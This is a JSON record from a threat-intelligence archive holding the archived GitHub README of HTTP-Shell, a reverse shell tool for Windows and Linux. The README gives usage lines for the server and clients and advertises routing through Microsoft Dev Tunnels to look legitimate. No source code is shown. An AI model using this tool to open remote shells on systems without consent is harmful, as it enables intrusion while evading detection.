{
	"id": "4435af94-cc01-46b3-86f3-5ac2f91f93ee",
	"created_at": "2026-04-06T00:07:18.768665Z",
	"updated_at": "2026-04-10T13:12:33.353207Z",
	"deleted_at": null,
	"sha1_hash": "f97b6743d82032c4e0413d4ead56f1f70205e3c5",
	"title": "GitHub - JoelGMSec/HTTP-Shell: MultiPlatform HTTP Reverse Shell",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 374625,
	"plain_text": "GitHub - JoelGMSec/HTTP-Shell: MultiPlatform HTTP Reverse\r\nShell\r\nBy JoelGMSec\r\nArchived: 2026-04-05 16:40:45 UTC\r\nHTTP-Shell is Multiplatform Reverse Shell. This tool helps you to obtain a shell-like interface on a reverse\r\nconnection over HTTP. Unlike other reverse shells, the main goal of the tool is to use it in conjunction with\r\nMicrosoft Dev Tunnels, in order to get a connection as close as possible to a legitimate one.\r\nThis shell is not fully interactive, but displays any errors on screen (both Windows and Linux), is capable of\r\nuploading and downloading files, has command history, terminal cleanup (even with CTRL+L), automatic\r\nreconnection, movement between directories and supports sudo (or sudo su) on Linux-based OS.\r\nRequirements\r\nPython 3 for Server (or Docker - see Usage section)\r\nInstall requirements.txt\r\nBash for Linux Client\r\nPowerShell 2.0 or greater for Windows Client\r\nDownload\r\nhttps://github.com/JoelGMSec/HTTP-Shell\r\nPage 1 of 3\n\nIt is recommended to clone the complete repository or download the zip file. You can do this by running the\r\nfollowing command:\r\ngit clone https://github.com/JoelGMSec/HTTP-Shell\r\nUsage\r\n# Server\r\n _ _ _____ _____ ____ ____ _ _ _\r\n | | | |_ _|_ _| _ \\ / ___|| |__ ___| | |\r\n | |_| | | | | | | |_) |___\\___ \\| \"_ \\ / _ \\ | |\r\n | _ | | | | | | __/_____|__) | | | | __/ | |\r\n |_| |_| |_| |_| |_| |____/|_| |_|\\___|_|_|\r\n \r\n ---------------- by @JoelGMSec -----------------\r\n[!] Usage: HTTP-Server.py [PORT]\r\n# Linux CLI\r\n[!] Usage: ./HTTP-Client.sh -c [HOST:PORT] -s [SLEEP] (optional)\r\n# Windows CLI\r\n[!] Usage: .\\HTTP-Client.ps1 -c [HOST:PORT] -s [SLEEP] (optional)\r\nIf you wish to run server in a Docker container:\r\ndocker build -t http-shell https://github.com/JoelGMSec/HTTP-Shell.git#main\r\ndocker run -it --rm -p 8080:8080 --name http-shell http-shell\r\nThe detailed guide of use can be found at the following link:\r\nhttps://darkbyte.net/obteniendo-shells-con-microsoft-dev-tunnels\r\nLicense\r\nThis project is licensed under the GNU 3.0 license - see the LICENSE file for more details.\r\nCredits and Acknowledgments\r\nhttps://github.com/JoelGMSec/HTTP-Shell\r\nPage 2 of 3\n\nOriginal idea and some code by Héctor de Armas Padrón (@3v4si0n)\r\nThis tool has been created and designed from scratch by Joel Gámez Molina (@JoelGMSec).\r\nContact\r\nThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or\r\nsecurity audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible\r\ndamage caused by it.\r\nFor more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.\r\nSupport\r\nYou can support my work buying me a coffee:\r\nSource: https://github.com/JoelGMSec/HTTP-Shell\r\nhttps://github.com/JoelGMSec/HTTP-Shell\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/JoelGMSec/HTTP-Shell"
	],
	"report_names": [
		"HTTP-Shell"
	],
	"threat_actors": [],
	"ts_created_at": 1775434038,
	"ts_updated_at": 1775826753,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f97b6743d82032c4e0413d4ead56f1f70205e3c5.pdf",
		"text": "https://archive.orkl.eu/f97b6743d82032c4e0413d4ead56f1f70205e3c5.txt",
		"img": "https://archive.orkl.eu/f97b6743d82032c4e0413d4ead56f1f70205e3c5.jpg"
	}
}